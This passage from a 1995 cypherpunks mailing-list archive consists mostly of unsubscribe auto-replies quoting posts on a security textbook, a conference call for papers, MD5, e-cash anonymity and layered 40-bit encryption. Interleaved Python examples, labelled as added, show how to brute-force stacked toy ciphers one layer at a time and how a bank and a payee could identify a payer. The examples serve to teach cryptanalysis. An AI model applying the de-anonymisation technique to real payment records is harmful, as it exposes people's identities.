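K1, K2 = 0x3C, 0xA5
MESSAGE = b"Plaintext-Body-1: quarterly report attached"

if __name__ == "__main__":
    _, _, _, fast = search_layer_by_layer(wrap(K1, K2, MESSAGE))
    _, _, _, slow = search_key_pairs(wrap(K1, K2, MESSAGE, header1=False))
    print(f"verifiable Header-1: {fast} trials (bound {2 * KEYSPACE})")
    print(f"no Header-1:         {slow} trials (bound {KEYSPACE ** 2})")
```

With the verifiable header the work is bounded by 2 * 2^KEY_BITS, one extra bit; only when nothing recognizable passes between the layers does the bound become 2^(2 * KEY_BITS).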








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:29:23 PDT
To: sandoval@cic.teleco.ulpgc.es (sandoval)
Subject: RE: textbooks
Message-ID: <1995Oct25.093008.1151.341061@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Patrick Horgan[SMTP:patrick@Verity.COM]
Sent:  Tuesday, October 24, 1995 2:21 PM
To:  sandoval
Cc:  cypherpunks
Subject:  Re: textbooks



I'm Cc:ing this to cypherpunks since I've gotten a lot of requests for this
information.

> From: sandoval@cic.teleco.ulpgc.es (Juan Domingo Sandoval Gonzalez)
>
> Dear Patrick,
> Thanks for your info about "Network Security Private Communication
> in a PUBLIC World" by Kaufman, Perlman and Speciner.
> To buy it I need to know Who published it.
> Do you know the Editor house?
>

"Network Security - PRIVATE Communication in a PUBLIC World", 1995, Prentice
Hall PTR, ISBN 0-13-061466-1, by Charlie Kaufman, Radia Perlman, and Mike
Speciner.

This book is amazing.  It explains hard concepts in ways that make them
seem obvious.  I can't state this too emphatically.  The style of the
book is conversational, approachable and a fun read, while at the same
time maintaining technical exactness to the point that you can implement
algorithms from the discussions in this book, (and understand how they
work.)

17.6.2 Coping with Export Controls is very interesting, detailing the weird
hoops that Lotus jumped through to retain as much security as possible while
still meeting export requirements.  The authors make the point that what
happens to you when you go through this process is almost random depending
on the times as well as the individual person you deal with.

The ASN.1 section is blunt about the space problems, and indeed much of the
book is refreshingly blunt about the stupidities involved in a lot of this
stuff.

The quick proof of why the initial and final permutations add nothing to
the security of DES is presented in an informal and quite obvious sidebar.
The comment is made that by the same argument the permutation of the key
in the generating of per-round keys also adds nothing to security.

It also includes homework and would be a wonderful textbook.

Here's an abbreviated version of the TOC.  Note that the real index is much
richer than this.  I've given the complete version of section 3.3 to
illustrate.  All typos are mine.  I think we can no longer refer to Bruce's
book as the Bible, but must refer to the two books as the Scriptures;)

Could someone refer me to some good crypto oriented math books?  Preferably
something as readable as this:)

Chapter 1 Introduction

1.1  Roadmap to the book
1.2  What type of book is this
1.3  Terminology
1.4  Notation
1.5  Primer on Networking
1.6  Tempest
1.7  Firewalls/Security Gateways
1.8  Key Escrow for Law Enforcement
1.9  Key Escrow for Careless Users
1.10 Viruses, Worms, Trojan Horses
1.11 The Military Model of Security
1.12 Legal Issues

Chapter 2 Introduction to Cryptography

2.1  What is Cryptography
2.2  Breaking an Encryption Scheme
2.3  Types of Cryptographic Functions
2.4  Secret Key Cryptography
2.5  Public Key Cryptography
2.6  Hash Algorithms
2.7  Homework

Chapter 3 Secret Key Cryptography

3.1  Introduction
3.2  Generic Block Encryption
3.3  Data Encryption Standard (DES)
     3.3.1  DES Overview
     3.3.2  The Permutations of the Data
     3.3.3  Generating the Per-Round Keys
     3.3.4  A DES Round
     3.3.5  The Mangler Function
     3.3.6  Weak and Semi-Weak Keys
     3.3.7  What's So Special About DES?
3.4  International Data Encryption Algorithm (IDEA)
3.5  Using Secret Key Cryptography in Protocols
3.6  Encrypting a Large Message
3.7  Generating MICs
3.8  Multiple Encryption DES
3.9  Homework

Chapter 4 Hashes and Message Digests

4.1  Introduction
4.2  Nifty Things to Do with a Hash
4.3  MD2
4.4  MD4
4.5  MD5
4.6  SHS
4.7  Homework

Chapter 5 Public Key Algorithms
5.1  Introduction
5.2  Modular Arithmetic
5.3  RSA
5.4  Diffie-Hellman
5.5  Digital Signature Standard (DSS)
5.6  Zero Knowledge Proof Systems
5.7  Homework Problems

Chapter 6  Number Theory

6.1  Introduction
6.2  Modular Arithmetic
6.3  Primes
6.4 Euclid's Algorithm
6.5  Chinese Remainder Theorem
6.6  Zn*
6.7  Euler's Totient Function
6.8  Euler's Theorem
6.9  Homework Problems

Chapter 7 Authentication Problems

7.1  Password-Based Authentication
7.2  Address-Based Authentication
7.3  Cryptographic Authentication Protocols
7.4  Who is Being Authenticated
7.5  Passwords as Cryptographic Keys
7.6  Eavesdropping and Server Database Reading
7.7  Trusted Intermediaries
7.8  Session Key Establishment
7.9  Authorization
7.10 Delegation
7.11 Homework

Chapter 8 Authentication of People

8.1 Passwords
8.2  On-Line Password Guessing
8.3  Off-Line Password Guessing
8.4  How Big Should a Secret Be?
8.5  Eavesdropping
8.6  Passwords and Careless Users
8.7  Initial Password Distribution
8.8  Authentication Tokens
8.9  Physical Access
8.10 Biometrics
8.11 Homework

Chapter 9 Security Handshake Pitfalls

9.1  Login Only
9.2  Mutual Authentication
9.3  Integrity/Encryption for Data
9.4  Mediated Authentication (with KDC)
9.5  Bellovin-Merritt
9.6  Network Login and Password Guessing
9.7  Nonce Types
9.8  Picking Random Numbers
9.9  X.509 Problem
9.10 Performance Considerations
9.11 Authentication Protocol Checklist
9.12 Homework

Chapter 10 Kerberos V4

10.1 Introduction
10.2 Tickets and Ticket-Granting Tickets
10.3  Configuration
10.4  Logging Into the Network
10.5  Replicated KDCs
10.6  Realms
10.7  Interrealm Authentication
10.8  Key Version Numbers
10.9  Encryption for Privacy and Integrity
10.10 Encryption for Integrity Only
10.11 Network Layer Addresses in Tickets
10.12 Message Formats
10.13 Homework

Chapter 11 Kerberos V5

11.1  ASN.1
11.2  Names
11.3  Delegation of Rights
11.4  Ticket Lifetimes
11.5  Key Versions
11.6  Making Master Keys in Different Realms Different
11.7  Optimizations
11.8  Cryptographic Algorithms
11.9  Hierarchy of Realms
11.10 Evading Password-Guessing Attacks
11.11 Key Inside Authenticator
11.12 Double TGT Authentication
11.13 KDC Database
11.14 Kerberos V5 Messages
11.15 Homework

Chapter 12 Electronic Mail Security

12.1  Distribution Lists
12.2  Store and Forward
12.3  Security Services for Electronic Mail
12.4  Establishing Keys
12.5  Privacy
12.6  Authentication of the Source
12.7  Message Integrity
12.8  Non-Repudiation
12.9  Proof of Submission
12.10 Proof of Delivery
12.11 Message Flow Confidentiality
12.12 Anonymity
12.13 Containment
12.14 Annoying Text Format Issues
12.15 Names and Addresses
12.16 Old Messages
12.17 Homework

Chapter 13 Privacy Enhanced Mail (PEM)

13.1  Introduction
13.2  Establishing Keys
13.3  Some PEM History
13.4  Certificate Hierarchy
13.5  Certificate Revocation Lists (CRLs)
13.6  X.509 Certificates and CRLs
13.7  Reformatting Data to Get Through Mailers
13.8  General Structure of a PEM Message
13.9  Encryption
13.10 Source Authentication and Integrity Protection
13.11 Multiple Recipients
13.12 Bracketing PEM Messages
13.13 Remote Distribution List Exploders
13.14 Forwarding and Enclosures
13.15 Canonicalization
13.16 Unprotected Information
13.17 Message Formats
13.18 DES-CBC as MIC Doesn't Work
13.19 Homework

Chapter 14 PGP (Pretty Good Privacy)

14.1  Introduction
14.2  Overview
14.3  Key Distribution
14.4  Efficient Encoding
14.5  Certificate and Key Revocation
14.6  Signature Types
14.7  Your Private Key
14.8  Key Rings
14.9  Anomalies
14.10 Object Formats

Chapter 15 X.400

15.1  Overview of X.400
15.2  Security Functions Possible with X.400
15.3  Structure of an X.400 Message

Chapter 16 A Comparison of PEM, PGP, and X.400

16.1  Introduction
16.2  Certificate Hierarchy
16.3  Certificate Distribution
16.4  Encryption
16.5  Encoding of Transmitted Messages
16.6  Cryptographic Algorithms Supported
16.7  Recipients with Multiple Keys
16.8  Mail-Intermediary-Provided Functions

Chapter 17 More Security Systems

17.1  NetWare V3
17.2  NetWare V4
17.3  KryptoKnight
17.4  SNMP
17.5  DASS/SPX
17.6  Lotus Notes Security
17.7  DCE Security
17.8  Microsoft Security
17.9  Network Denial of Service
17.10 Clipper
17.11 Homework

Bibliography
Glossary
Index
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     |
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    |
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel |
  \___________________________________________________________\)__________/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:29:29 PDT
To: llurch@networking.stanford.edu (Rich Graves)
Subject: RE: Pointer to article on ex parte searc
Message-ID: <1995Oct25.093009.1151.341062@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Rich Graves[SMTP:llurch@networking.stanford.edu]
Sent:  Tuesday, October 24, 1995 2:21 PM
To:  cypherpunks
Subject:  Pointer to article on ex parte search & sezure


That's where somebody, e.g. Microsoft or the Church of Scientology, gets
US Federal Marshals to seize your computer.

Article <46j4t6$6od@newsbf02.news.aol.com> in alt.religion.scientology is
a good article by Adam S. Bauman of the Los Angeles Times. You might find
it interesting, but not quite relevant enough to post the whole thing
here.

 -rich






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:29:50 PDT
To: mab@research.att.com (Matt Blaze)
Subject: RE: CRYPTO '96 CFP
Message-ID: <1995Oct25.093009.1151.341063@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Matt Blaze[SMTP:mab@research.att.com]
Sent:  Tuesday, October 24, 1995 5:22 PM
To:  cypherpunks
Subject:  CRYPTO '96 CFP

Sender: owner-cypherpunks@toad.com
Precedence: bulk

                            CRYPTO '96

         August 18-22, 1996, Santa Barbara, California, USA

                          CALL FOR PAPERS


General Information:

Crypto '96, the Sixteenth Annual Crypto Conference, is organized by the
International Association for Cryptologic Research (IACR), in
cooperation with the IEEE Computer Society Technical Committee on
Security and Privacy, and the Computer Science Department of the
University of California, Santa Barbara.  Original papers are solicited
on all technical aspects of cryptology.

Instructions for Authors:

Please send a cover letter, one title page and 16 copies of an extended
abstract.  They must be received by the Program Chair at the address
given below no later than February 14, 1996 (or postmarked by February
4, 1996 and sent via airmail).

The cover letter must state: "This paper does not substantially
duplicate work that any of the authors have published elsewhere or have
submitted in parallel to any other conference or workshop that has
proceedings."

The title page should contain the title, the names of the authors, their
postal and e-mail addresses and the short abstract; it should be made
clear who is the author to whom correspondence should be sent.  The
first page of the extended abstract should be an informal one-page
statement (that will not be published in the Proceedings) describing the
content of the oral presentation that will be given at Crypto '96 in the
event the paper is accepted (this statement is expected to be different
from the short abstract of the paper).  This page and the extended
abstract must be ANONYMOUS, i.e., they must contain no indication
whatsoever of the identity of the author(s).  The main body of the
extended abstract should start with the title, short abstract, and list
of keywords.  This should be followed by a succinct statement
appropriate for a non-specialist reader specifying the subject
addressed, its background, the main achievements, and their significance
to cryptology.  Technical details directed to the specialist should then
follow.

Submissions are limited to 10 single-spaced pages of 11pt type, not
counting the bibliography and clearly marked appendices.  Since referees
are not required to read the appendices, the paper should be
intelligible without them.  The paper including bibliography and
appendices must run to no more than 15 pages.  These limits will be
strictly enforced.

Unfortunately, because of the burdens on the Program Committee and
the need to keep strictly to the time schedule, we will have to
summarily reject any submission not in keeping with the above
instructions.

Authors are encouraged to make 2-sided copies if possible.  Please send
submissions by post; unfortunately, we cannot accept submissions by
e-mail or fax.

Notification of acceptance or rejection will be sent to authors on
April 22, 1996.

Conference Proceedings:

Proceedings will be available at the meeting.  They will be published in
the Springer-Verlag Lecture Notes in Computer Science.  Clear
instructions about the final copy will be sent to authors of accepted
papers.  The final copies of the accepted papers will be due on June 1,
1996.  Final papers arriving too late will be removed from the main
program.  Authors of accepted papers must guarantee that their paper
will be presented at the conference.

Stipends:

A limited number of stipends are available to those unable to obtain
funding to attend the conference.  Students whose papers are accepted
and who will present the paper themselves are encouraged to apply if
such assistance is needed.  Requests for stipends should be addressed to
the general chair.

Send submissions to:

Neal Koblitz, Program Chair, Crypto '96
Dept. of Mathematics, Box 354350
University of Washington
Seattle, WA 98195 U.S.A.
Internet: koblitz@math.washington.edu
Phone: 1-206-543-4386

For other information contact:

Richard Graveman, General Chair, Crypto '96
Bellcore
444 Hoes Lane RM 1K-221
Piscataway, NJ 08854 U.S.A.
Internet: rfg@ctt.bellcore.com
Phone: 1-908-699-4611

Program Committee:

Neal Koblitz, Chair (Mathematics, University of Washington, USA)

Mihir Bellare (Computer Science, University of California at San Diego, USA)
Josh Benaloh (Microsoft, USA)
Matt Blaze (AT&T Bell Laboratories, USA)
Johannes Buchmann (Computer Science, Universitaet des Saarlandes, Germany)
Don Coppersmith (IBM Research, USA)
Joan Feigenbaum (AT&T Bell Laboratories, USA)
Andrew Klapper (Computer Science, University of Kentucky, USA)
Lars Knudsen (Computer Science, Ecole Normale Superieure, France)
Peter Landrock (Mathematics, Aarhus University, Denmark)
Tsutomu Matsumoto (Electrical & Computer Engineering, Yokohama National
University, Japan)
Chris Mitchell (Computer Science, University of London, UK)
Paul Van Oorschot (Bell-Northern Research, Canada)
Bart Preneel (Catholic University at Leuven, Belgium)
Rainer Rueppel (R3 Security Engineering, Switzerland)
Jacques Stern (Computer Science, Ecole Normale Superieure, France)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:29:47 PDT
To: patrick@Verity.COM (Patrick Horgan)
Subject: RE: MD5 concerns, was Re: Netscape Logic
Message-ID: <1995Oct25.093009.1151.341065@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Patrick Horgan[SMTP:patrick@Verity.COM]
Sent:  Tuesday, October 24, 1995 1:08 PM
To:  fc
Cc:  cypherpunks
Subject:  MD5 concerns, was Re: Netscape Logic Bomb detailed by IETF


> channel.  I think that Netscape uses an MD5 checksum which the members
> of this list seem to place unlimited trust in (incorrectly in my view,

This is the second time you've implied that an MD5 checksum might not be
as secure as we think.  Could you share your thinking on this?  I had
believed from reading the algorithm that it's not possible to predict how
a change in the input will affect the checksum.  Given a modified version
of netscape for example, how would you change some non-critical portion of
the code to get the same checksum that the original should have.  I suppose
that given n bits of non-critical space in the code, (non-critical meaning
that changing them will have no effect on the execution of the code, and
assuming that you don't want to change the length of the code), that you
could try all possible combinations of those bits, or 2^n trials and
see if you get the correct MD5 checksum.  If you do, then on average you'd
actually only have to try 2^(n-1) trials. What if you don't?  What would
you do then?  MD5 produces a 128 bit output, and it would seem likely that
this would be hard.  As far as I know there are no known attacks for any
MDx algorithms in spite of Ron's worries about MD4.  It's a subject of
on-going research though, and it is only "conjectured that it is
computationally infeasible to produce two messages having the same
message digest, or to produce any messages having a given prespecified
target message digest." (RFC 1321)  So, if you have newer information,
or pointers to any papers, (other than the den Boer and Bosselaers papers),
could you let me know?

Thanks,

Patrick

   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     |
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    |
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel |
  \___________________________________________________________\)__________/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:30:01 PDT
To: weidai@eskimo.com (Wei Dai)
Subject: RE: How can e-cash, even on-line cleared
Message-ID: <1995Oct25.093010.1151.341066@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Wei Dai[SMTP:weidai@eskimo.com]
Sent:  Tuesday, October 24, 1995 1:55 PM
To:  Hal
Cc:  cypherpunks
Subject:  Re: How can e-cash, even on-line cleared, protect payee identity?


On Mon, 23 Oct 1995, Hal wrote:

> This is an interesting idea but it is more complicated than necessary, I
> think.  The denomination can be carried in the exponent, in which case
> there is no need for cut and choose and nobody can cheat the bank.  A
> coin suitable for deposit is a signed number of some special form.  To
> pay Bob, Alice does not withdraw anything ahead of time.  Rather, Bob
> gives her a blinded coin, which she reblinds and gives to the bank.  The
> bank signs it (debiting Alice's account) and gives it back to her.  She
> strips off her blinding and gives it to Bob.  He strips off his own
> blinding and verifies that he is left with a signed number of the
> appropriate form.

Using the above protocol, payee anonymity will not be compromised by
collusion between the bank and the payer, but the payee and the bank can
collude to identify the payer!  (This reverses the situation in normal
Chaumian ecash, and of course in certain circumstances may be preferable.)

This collusion can succeed even if Alice (the payer) reblinds the coin
she gets from Bob before asking the bank to sign it, because Alice must
withdraw the coin after Bob gives it to her and before returning it to Bob.
Bob can ask the bank to record the names of everyone who withdrew money
during that period, and after two or three repeated transactions can
narrow the list of possible payers down to one person.  (This is reminiscent
of the time-correlation attack on remailers.)  In the original protocol
this isn't possible because Alice can withdraw the money ahead of time.

Wei Dai
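
The exchange discussed in the message above, as an added example that is not part of the original posts: a toy RSA run of the double-blinded withdrawal (Bob blinds, Alice reblinds, the bank signs), followed by the window-intersection a cooperating payee and bank could perform on the bank's own log. The key size, exponent values, coin format, account names and timestamps are all constructed assumptions.

```python
import hashlib
import random
from math import gcd

# Constructed toy bank key (two Mersenne primes); far too small for real use.
P, Q = 2**31 - 1, 2**61 - 1
N, PHI = P * Q, (P - 1) * (Q - 1)
# Denomination carried in the public exponent; these values are assumptions.
EXPONENTS = {1: 17, 5: 19, 10: 23}
rng = random.Random(1995)  # fixed seed so the run is reproducible


def make_coin(serial):
    """Coin of 'special form': 4-byte serial followed by 6 bytes of its SHA-256."""
    s = serial.to_bytes(4, "big")
    return int.from_bytes(s + hashlib.sha256(s).digest()[:6], "big")


def has_special_form(x):
    if x >= 1 << 80:
        return False
    raw = x.to_bytes(10, "big")
    return raw[4:] == hashlib.sha256(raw[:4]).digest()[:6]


def blinding_factor():
    while True:
        r = rng.randrange(2, N)
        if gcd(r, N) == 1:
            return r


def blind(x, r, e):
    return x * pow(r, e, N) % N


def unblind(s, r):
    return s * pow(r, -1, N) % N


class Bank:
    def __init__(self):
        self.log = []  # (time, account, value signed): everything the bank sees

    def sign(self, account, blinded, denom, now):
        d = pow(EXPONENTS[denom], -1, PHI)  # private exponent for this denomination
        self.log.append((now, account, blinded))
        return pow(blinded, d, N)

    def withdrawers(self, start, end):
        return {acct for t, acct, _ in self.log if start <= t <= end}


def pay(bank, payer, serial, denom, t_withdraw):
    """One payment: Bob blinds, Alice reblinds, bank signs, both unblind."""
    e = EXPONENTS[denom]
    coin = make_coin(serial)
    r_bob, r_alice = blinding_factor(), blinding_factor()
    to_alice = blind(coin, r_bob, e)            # Bob -> Alice
    to_bank = blind(to_alice, r_alice, e)       # Alice -> bank
    signed = bank.sign(payer, to_bank, denom, t_withdraw)
    to_bob = unblind(signed, r_alice)           # Alice -> Bob
    sig = unblind(to_bob, r_bob)                # Bob holds coin^d mod N
    verified = has_special_form(coin) and pow(sig, e, N) == coin
    return verified, coin, to_bank


def correlate(bank, windows):
    """Payee + bank: intersect the accounts that withdrew inside each window
    between Bob handing out a blinded coin and receiving it back signed."""
    suspects, history = None, []
    for start, end in windows:
        seen = bank.withdrawers(start, end)
        suspects = seen if suspects is None else suspects & seen
        history.append(sorted(suspects))
    return history


def demo():
    bank = Bank()
    # Constructed background traffic: (time, account) of unrelated withdrawals.
    for t, acct in [(3, "carol"), (12, "dave"), (14, "erin"), (31, "carol"),
                    (34, "dave"), (52, "carol"), (55, "erin")]:
        bank.sign(acct, blinding_factor(), 5, t)
    windows = [(10, 15), (30, 35), (50, 56)]  # (coin sent, coin returned)
    runs = [pay(bank, "alice", i, 5, start + 2)
            for i, (start, _) in enumerate(windows, 1)]
    return runs, correlate(bank, windows)


if __name__ == "__main__":
    runs, history = demo()
    print("signatures verify:", all(ok for ok, _, _ in runs))
    print("suspects after each payment:", history)
```

The bank never sees the coin itself, only the doubly blinded value, yet the forced ordering of the withdrawal inside each window is enough to shrink the candidate set; a design that lets the payer withdraw ahead of time removes that window.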






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:30:00 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: RE: USA Today Against ITAR & GAK
Message-ID: <1995Oct25.093010.1151.341069@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Cypherpunks Mailing List[SMTP:cypherpunks@toad.com]
Sent:  Tuesday, October 24, 1995 4:51 PM
To:  Cypherpunks Mailing List
Subject:  USA Today Against ITAR & GAK


I'm pleased to report that USA Today editorializes today (Tuesday, Oct. 24,
1995) against both ITAR and GAK.

They get the chronology of the SSL brute-forcing and PRNG seed prediction
attacks on Netscape Navigator backwards, but they get many other things right
in a fairly short editorial. I am certainly encouraged by this development.
Someone at USA Today definitely got the message that the ITAR are a large
obstacle to net security in the U.S.

Some particularly apropos quotations (from pg. 12A):
   

On ITAR:
 "[After the Netscape hacks] the perception of the Internet as
  insecure was indelible. That needn't be. Encryption software
  available right now is exponentially more powerful and could
  make code breaking virtually impossible. Its use is blocked
  by government export regulations that make the programs
  difficult if not impossible to market, even for domestic
  purposes."

On GAK:
 "[...] key escrow [...] may sound reasonable, but apply that
  reasoning to more mundane areas of life. What the government
  is saying is yes, you can put bars on your windows, locks on
  your doors and put your jewelry in a safe, but you have to
  give us the keys and the combination because you might be a
  crook."

That phrasing sounds rather familiar....

 "The [GAK] system -- which the FBI and the Commerce Department
  declined to defend in an opposing view to this editorial [...]"

Now I find that surprising. Since when does the FBI not even try to justify
Clipper and its descendants in the newspapers?

For foreign readers, I'll note that USA Today has easily the largest
national circulation of any daily newspaper in the U.S.

[Letters to the editor can be emailed to usatoday@clark.net; they want you
 to give your snail-mail address and home and work phone numbers so they
 can check your identity.]

 -Futplex <futplex@pseudonym.com>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:30:06 PDT
To: sameer@c2.org (sameer)
Subject: RE: What is needed for S/MIME remailer ?
Message-ID: <1995Oct25.093010.1151.341071@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Raph Levien[SMTP:raph@CS.Berkeley.EDU]
Sent:  Tuesday, October 24, 1995 1:27 PM
To:  sameer
Cc:  cypherpunks; baldwin
Subject:  Re: What is needed for S/MIME remailer ?


sameer writes, among other things:

> A) limit on number of multiple concurrent processes doing
> decryption. Remailer spams have the bad effect of spawning hundreds of
> concurrent PGPs on the mailhost, bringing things to halt. Limiting
> number of concurrent decryptions would help this problem.

Agreed.

> B) A strong interaction with the UNIX shell, with the program
> returning a return code based on whether or not the decryption
> succeeded. (Remailers only do decryptions...) That way a remailer
> could do something like:

We very much need a command line interface to S/MIME, to use in remailers
and also for other kinds of testing/hacking. I hope one is forthcoming
soon.

>  I think the smime should be easily plugged into premail as
> well, but I don't know premail to know what would be necessary for
> that. I suspect Raph would have some input on that matter.

Raph does indeed have some input on the matter. I am currently rewriting
premail from the ground up, and am about 700 lines into it. One specific
design goal was the support of other types of encryption, including
Mixmaster and MOSS in the first release, and hopefully others as well.
Basically, I'm waiting on a command line S/MIME implementation as
described above, most hopefully as free software.

In any case, the new premail is _much_ more modular, so plugging in
experimental email stuff should be pretty straightforward.

Raph







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:31:18 PDT
To: mixmaster@obscura.com (Mixmaster)
Subject: RE: No Subject
Message-ID: <1995Oct25.091200.1151.341073@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Mixmaster[SMTP:mixmaster@obscura.com]
Sent:  Tuesday, October 24, 1995 1:10 PM
To:  cypherpunks
Subject:  No Subject



To All,

    A theme I have been thinking about lately is a virtual
data haven using an m from n secret splitting scheme via
a DC Net for access and hosting the entire process via HTML
and W3. The salient feature would be database objects split in such a way
that participating
sites would possess no more than 1 encrypted slice of any particular
encrypted object. Some redundancy of storage is built into the design and
participating sites give up local storage to store other slices
of the datahaven. At no time is the site hosting able to
make correlations of slices to plaintext traffic because the
split is done on the user's workstation and the placement of the slice
on the individual slice on the member datahaven site is accomplished with
encrypted remailer tech (probably Mixmaster 2) and CGI or java
scripts. The idea here is to be able to store ANY information on the net
not just what the local bluenoses approve of.

    anon








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:31:05 PDT
To: jeffb@sware.com (Jeff Barber)
Subject: RE: 80 bit security from 40 bit exportab
Message-ID: <1995Oct25.093122.1151.341074@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Jeff Barber[SMTP:jeffb@sware.com]
Sent:  Tuesday, October 24, 1995 4:05 PM
To:  RobertW.Baldwin
Cc:  cypherpunks
Subject:  Re: 80 bit security from 40 bit exportable products


baldwin writes:
>
>         Long ago vendors should have put encryption into network layer
> products, but for a variety of reasons that effort was delayed or
> discouraged.  One effect of this lack is that almost every layer of
> the network stack is adding its own encryption.  For example, the
> HTTP session layer added S-HTTP and the TCP transport layer added
> SSL.  Soon we will have network layer encryption with IPsec.
>         The vendors for each layer can export a product that uses
> ciphers with 40 bit keys.  A user can then combine multiple
> products to get more than 40 bits worth of security.  For example,
> a web client might fetch an S-HTTP page over an SSL protected link
> via a firewall that supports IPsec tunnels.  That's three 40 bit
> keys protecting the data over the internet link (of course, this
> may not be equivalent to a 120 bit cipher, that depends on the
> details of the cipher systems and independence of the key setups).
> Interesting possibilities.
>                 --Bob Baldwin

Even if you assume complete independence of key setup, if a successful
decryption at each layer can be independently detected and verified
(which seems likely in your example), there're only about 3 * (2 ^ 40)
total operations in the worst case, NOT 2 ^ (3 * 40) operations needed
to expose the plaintext.  This is an effective 41.5 bits, not 120.


 -- Jeff
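
The counting argument in the reply above, as an added example that is not part of the original posts: three toy layers with 12-bit keys (a constructed stand-in for the 40-bit ciphers), each carrying a recognisable header so that a correct key at one layer can be confirmed without touching the others. The cipher, header bytes, keys and message are assumptions made for the illustration.

```python
import hashlib
import math

KEY_BITS = 12            # toy key size per layer (stand-in for 40 bits)
MAGIC = b"LAYERHDR"      # constructed framing that makes a correct key detectable


def keystream(key, layer, n):
    """Toy stream cipher: SHA-256 in counter mode keyed by (layer, key)."""
    out, counter = b"", 0
    while len(out) < n:
        out += hashlib.sha256(f"{layer}:{key}:{counter}".encode()).digest()
        counter += 1
    return out[:n]


def xor(data, ks):
    return bytes(a ^ b for a, b in zip(data, ks))


def wrap(plaintext, keys):
    """Encrypt inside-out: layer 1 is innermost, each layer adds its own header."""
    data = plaintext
    for layer, key in enumerate(keys, 1):
        framed = MAGIC + data
        data = xor(framed, keystream(key, layer, len(framed)))
    return data


def peel_layers(ciphertext, n_layers):
    """Search each layer's key space separately, outermost layer first."""
    data, trials, found = ciphertext, 0, []
    for layer in range(n_layers, 0, -1):
        for key in range(2 ** KEY_BITS):
            trials += 1
            head = xor(data[:len(MAGIC)], keystream(key, layer, len(MAGIC)))
            if head == MAGIC:            # this layer's decryption verified alone
                data = xor(data, keystream(key, layer, len(data)))[len(MAGIC):]
                found.append(key)
                break
        else:
            raise ValueError(f"no key found for layer {layer}")
    return data, found[::-1], trials


def effective_bits(n_layers, key_bits, independent_check=True):
    """log2 of worst-case trials: a sum if layers fall one by one, a product
    only if no layer's decryption can be recognised on its own."""
    if independent_check:
        return math.log2(n_layers) + key_bits
    return float(n_layers * key_bits)


def demo():
    keys = [0x3A7, 0xFFF, 0x05C]                 # constructed per-layer keys
    message = b"GET /index.html"                 # constructed plaintext
    recovered, found, trials = peel_layers(wrap(message, keys), len(keys))
    return message, keys, recovered, found, trials


if __name__ == "__main__":
    message, keys, recovered, found, trials = demo()
    print("recovered:", recovered, "keys:", [hex(k) for k in found])
    print("trials:", trials, "of at most", 3 * 2 ** KEY_BITS)
    print("3 x 40-bit, layers checkable:", effective_bits(3, 40))
    print("3 x 40-bit, no per-layer check:", effective_bits(3, 40, False))
```

The practical consequence for a design review is that stacked weak layers only multiply their strength if an outer layer's correct decryption is indistinguishable from an incorrect one, which protocol headers usually prevent.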






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:31:16 PDT
To: sameer@c2.org (sameer)
Subject: RE: What is needed for S/MIME remailer ?
Message-ID: <1995Oct25.093122.1151.341075@smtpgate.cmp.com>
MIME-Version: 1.0
